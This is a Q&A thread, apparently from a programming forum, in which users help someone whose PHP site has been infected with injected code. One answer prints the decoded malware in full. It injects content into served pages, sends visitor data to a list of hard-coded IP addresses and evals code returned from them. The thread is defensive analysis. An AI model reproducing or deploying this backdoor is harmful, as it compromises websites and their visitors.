echo '<script>window.location.reload();</script>';
exit();
in this part the script tries to find other php
files in the current and in the subdirecories and infects them too.
Upvotes: 7
Reputation: 15
Coming from a security background I'm pretty sure your web server has been hacked. To begin with it is generally a good idea to investigate the source, to prevent making that mistake from occurring again.
To begin with:
If you're on a shared hosting there isn't much you can do, shared hosting users are generally more vulnerable to getting cracked but if you're on a VPS or better you can contact your host in case of a managed hosting for a complete format or necessary security fixed.
However, the thing is that removing those snippets will 99.99% of the time have no use, it won't prevent the cracker in the future. Changing passwords helps, but again it is not a solid solution.
If you have the resources, hire a security professional to do a quick audit. There are many that ask for payment only if they find a weakness. If not, then re-evaluate potential weak points in your server. Refer to this one for Linux Servers (http://www.thegeekstuff.com/2011/03/apache-hardening) Incase you're using Windows, let me know I'll link you to a few for windows IIS as well.
Glad I could help!
Upvotes: 1
Reputation: 4459
I would say remove all of the snippets like it, change all of your passwords and if possible, take your website offline until support can get back to you. It sure looks like its up to no good, after some digging through the code and decoding, i found this:
<?php
if (!function_exists("GetMama")){
function mod_con($buf){
str_ireplace("<body>","<body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); return $buf;
}str_ireplace("</body>","</body>",$buf,$cnt_h);if ($cnt_h == 1) {
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); return $buf;
}return $buf;
}function opanki($buf){
$gz_e = false;$h_l = headers_list();if (in_array("Content-Encoding: gzip", $h_l)) {
$gz_e = true;
}if ($gz_e){
$tmpfname = tempnam("/tmp", "FOO");file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r");$contents = gzread($zd, 10000000);$contents = mod_con($contents);gzclose($zd);unlink($tmpfname);$contents = gzencode($contents);
} else {$contents = mod_con($buf);
}$len = strlen($contents);header("Content-Length: ".$len);return($contents);
} function GetMama(){
$mother = "www.99bits.com";return $mother;
}ob_start("opanki");function ahfudflfzdhfhs($pa){
$mama = GetMama();$file = urlencode(__FILE__);if (isset($_SERVER["HTTP_HOST"])){
$host = $_SERVER["HTTP_HOST"];
} else {$host = "";
}if (isset($_SERVER["REMOTE_ADDR"])){
$ip = $_SERVER["REMOTE_ADDR"];
} else {$ip = "";
}if (isset($_SERVER["HTTP_REFERER"])){
$ref = urlencode($_SERVER["HTTP_REFERER"]);
} else {$ref = "";
}if (isset($_SERVER["HTTP_USER_AGENT"])){
$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));
} else {$ua = "";
}if (isset($_SERVER["QUERY_STRING"])){
$qs = urlencode($_SERVER["QUERY_STRING"]);
} else {$qs = "";
}$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0991&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs;$try = true;if( function_exists("curl_init") ){
$ch = curl_init($url_0 . $url_1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_TIMEOUT, 3);$ult = trim(curl_exec($ch));$try = false;
} if ((ini_get("allow_url_fopen")) && $try) {
$ult = trim(@file_get_contents($url_0 . $url_1));$try = false;
}if($try){
$fp = fsockopen($pa, 80, $errno, $errstr, 30);if ($fp) {
$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out);$ret = "";while (!feof($fp)) {
$ret .= fgets($fp, 128);
}fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
}
} if (strpos($ult,"eval") !== false){
$z = stripslashes(str_replace("eval","",$ult)); eval($z); exit();
}if (strpos($ult,"ebna") !== false){
$_SERVER["good"] = str_replace("ebna","",$ult);return true;
}else {return false;
}
}$father2[] = "78.46.173.14";$father2[] = "176.9.218.191";$father2[] = "91.228.154.254";$father2[] = "77.81.241.253";$father2[] = "184.82.117.110";$father2[] = "46.4.202.93";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "46.30.41.99";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "78.47.184.33";$father2[] = "31.184.234.96";shuffle($father2);foreach($father2 as $ur){
if ( ahfudflfzdhfhs($ur) ) {
break ;
}
}
}
Upvotes: 5
Reputation: 33141
It appears to be a php type shell script that is injected into your site. It could be a vulnerability by the web hosting company or your personal web app allowing the hack to occur.
Upvotes: 0